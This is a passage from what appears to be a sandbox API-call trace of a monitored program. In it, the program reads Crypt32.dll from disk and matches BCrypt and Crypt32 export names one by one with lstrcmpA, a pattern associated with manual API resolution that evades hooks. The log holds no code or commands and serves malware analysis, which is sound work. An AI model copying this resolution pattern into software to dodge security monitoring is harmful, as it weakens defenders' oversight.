(lpString1="BCryptEncrypt", lpString2="BCryptCreateContext") returned 1 [0138.870] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateHash") returned 1 [0138.870] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateMultiHash") returned 1 [0138.870] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDecrypt") returned 1 [0138.870] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeleteContext") returned 1 [0138.870] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKey") returned 1 [0138.870] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyCapi") returned 1 [0138.870] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0138.870] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyHash") returned 1 [0138.870] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyKey") returned 1 [0138.870] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroySecret") returned 1 [0138.870] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateHash") returned 1 [0138.870] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateKey") returned 1 [0138.870] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptEncrypt") returned 0 [0138.870] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunction") returned 1 [0138.870] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunctionProvider") returned 1 [0138.871] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0138.871] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContext") returned 1 [0138.871] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContextFunction") returned 1 [0138.871] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateContext") returned 1 [0138.871] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateHash") returned 1 [0138.871] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateMultiHash") returned 1 [0138.871] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDecrypt") returned 1 [0138.871] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeleteContext") returned 1 [0138.871] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKey") returned 1 [0138.871] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyCapi") returned 1 [0138.871] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0138.871] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyHash") returned 1 [0138.871] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyKey") returned 1 [0138.871] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroySecret") returned 1 [0138.871] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateHash") returned 1 [0138.871] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateKey") returned 1 [0138.871] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEncrypt") returned 1 [0138.871] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEnumAlgorithms") returned 0 [0138.871] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunction") returned 1 [0138.871] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunctionProvider") returned 1 [0138.871] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0138.871] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContext") returned 1 [0138.871] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContextFunction") returned 1 [0138.871] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateContext") returned 1 [0138.871] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateHash") returned 1 [0138.872] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateMultiHash") returned 1 [0138.872] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDecrypt") returned 1 [0138.872] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeleteContext") returned 1 [0138.872] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKey") returned 1 [0138.872] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyCapi") returned 1 [0138.872] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0138.872] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyHash") returned 1 [0138.872] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyKey") returned 1 [0138.872] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroySecret") returned 1 [0138.872] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateHash") returned 1 [0138.872] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateKey") returned 1 [0138.872] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEncrypt") returned 1 [0138.872] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumAlgorithms") returned 1 [0138.872] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumContextFunctionProviders") returned 0 [0138.872] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunction") returned 1 [0138.872] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunctionProvider") returned 1 [0138.872] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0138.872] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContext") returned 1 [0138.872] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContextFunction") returned 1 [0138.872] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateContext") returned 1 [0138.872] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateHash") returned 1 [0138.872] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateMultiHash") returned 1 [0138.872] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDecrypt") returned 1 [0138.872] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeleteContext") returned 1 [0138.872] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKey") returned 1 [0138.872] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyCapi") returned 1 [0138.873] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0138.873] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyHash") returned 1 [0138.873] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyKey") returned 1 [0138.873] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroySecret") returned 1 [0138.873] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateHash") returned 1 [0138.873] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateKey") returned 1 [0138.873] GetProcessHeap () returned 0x430000 [0138.873] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d62010 | out: hHeap=0x430000) returned 1 [0138.874] GetProcessHeap () returned 0x430000 [0138.874] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x4492e0 [0138.875] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffc5c190000 [0138.883] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0138.883] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0138.884] GetModuleFileNameA (in: hModule=0x7ffc5c190000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0138.884] CreateFileA (lpFileName="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0138.884] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0138.884] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0138.884] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1847520) returned 1 [0138.884] GetProcessHeap () returned 0x430000 [0138.884] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1c30e0) returned 0x4122040 [0138.889] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0138.890] ReadFile (in: hFile=0x160, lpBuffer=0x4122040, nNumberOfBytesToRead=0x1c30e0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4122040*, lpNumberOfBytesRead=0x14f5a4*=0x1c30e0, lpOverlapped=0x0) returned 1 [0139.127] CloseHandle (hObject=0x160) returned 1 [0139.128] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertAddCRLContextToStore") returned 0 [0139.128] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0139.128] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 0 [0139.128] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLContextToStore") returned 1 [0139.128] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0139.128] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCTLContextToStore") returned 0 [0139.128] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0139.128] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0139.128] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLContextToStore") returned 1 [0139.128] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLLinkToStore") returned 0 [0139.128] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLContextToStore") returned -1 [0139.128] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0139.128] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLContextToStore") returned -1 [0139.128] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0139.128] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCertificateContextToStore") returned 0 [0139.128] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLContextToStore") returned -1 [0139.128] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0139.128] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLContextToStore") returned -1 [0139.128] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0139.128] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0139.128] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateLinkToStore") returned 0 [0139.128] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0139.128] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0139.128] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0139.128] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0139.128] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0139.128] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.128] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddEncodedCRLToStore") returned 0 [0139.129] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0139.129] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0139.129] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0139.129] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0139.129] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0139.129] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.129] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0139.129] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCTLToStore") returned 0 [0139.129] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLContextToStore") returned 1 [0139.129] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0139.129] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLContextToStore") returned 1 [0139.129] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0139.129] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0139.129] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.129] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCRLToStore") returned -1 [0139.129] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCTLToStore") returned -1 [0139.129] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCertificateToStore") returned 0 [0139.129] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLContextToStore") returned 1 [0139.129] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLLinkToStore") returned 1 [0139.129] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLContextToStore") returned 1 [0139.129] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLLinkToStore") returned 1 [0139.130] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateContextToStore") returned 1 [0139.130] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.130] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCRLToStore") returned -1 [0139.130] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCTLToStore") returned -1 [0139.130] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToStore") returned 1 [0139.130] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 0 [0139.130] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLContextToStore") returned 1 [0139.130] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLLinkToStore") returned 1 [0139.130] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLContextToStore") returned 1 [0139.130] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLLinkToStore") returned 1 [0139.130] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateContextToStore") returned 1 [0139.130] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.130] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCRLToStore") returned -1 [0139.130] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCTLToStore") returned -1 [0139.130] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToStore") returned 1 [0139.130] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0139.130] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 0 [0139.130] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLContextToStore") returned 1 [0139.130] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLLinkToStore") returned 1 [0139.130] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLContextToStore") returned 1 [0139.130] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLLinkToStore") returned 1 [0139.130] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateContextToStore") returned 1 [0139.130] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.130] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCRLToStore") returned 1 [0139.130] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCTLToStore") returned 1 [0139.130] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToStore") returned 1 [0139.130] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0139.130] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0139.130] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 0 [0139.130] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0139.130] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0139.130] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0139.130] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0139.131] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0139.131] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.131] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0139.131] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0139.131] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0139.131] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0139.131] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0139.131] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0139.131] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 0 [0139.131] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLContextToStore") returned 1 [0139.131] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLLinkToStore") returned 1 [0139.131] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLContextToStore") returned 1 [0139.131] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLLinkToStore") returned 1 [0139.131] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateContextToStore") returned 1 [0139.131] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.131] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCRLToStore") returned 1 [0139.131] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCTLToStore") returned 1 [0139.131] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToStore") returned 1 [0139.131] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0139.131] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0139.131] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0139.131] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponse") returned 1 [0139.131] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponseContext") returned 0 [0139.131] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLContextToStore") returned 1 [0139.131] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0139.131] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLContextToStore") returned 1 [0139.131] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0139.131] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0139.131] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.132] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0139.132] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0139.132] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0139.132] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0139.132] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0139.132] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0139.132] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0139.132] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0139.132] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddSerializedElementToStore") returned 0 [0139.132] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLContextToStore") returned 1 [0139.132] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLLinkToStore") returned 1 [0139.132] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLContextToStore") returned 1 [0139.132] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLLinkToStore") returned 1 [0139.132] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateContextToStore") returned 1 [0139.132] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.132] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCRLToStore") returned 1 [0139.132] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCTLToStore") returned 1 [0139.132] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToStore") returned 1 [0139.132] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0139.132] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0139.132] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0139.132] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponse") returned 1 [0139.132] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0139.132] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddSerializedElementToStore") returned 1 [0139.132] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddStoreToCollection") returned 0 [0139.132] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLContextToStore") returned 1 [0139.133] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLLinkToStore") returned 1 [0139.133] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLContextToStore") returned 1 [0139.133] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLLinkToStore") returned 1 [0139.133] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateContextToStore") returned 1 [0139.133] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.133] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCRLToStore") returned 1 [0139.133] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCTLToStore") returned 1 [0139.133] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToStore") returned 1 [0139.133] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0139.133] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0139.133] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0139.133] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponse") returned 1 [0139.133] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0139.133] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddSerializedElementToStore") returned 1 [0139.133] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddStoreToCollection") returned 1 [0139.133] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAlgIdToOID") returned 0 [0139.133] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0139.133] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0139.133] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0139.133] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0139.133] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0139.133] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0139.133] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0139.133] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0139.133] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0139.133] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0139.133] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0139.133] lstrcmpA (lpString1="CertCloseServerOcspResponse", 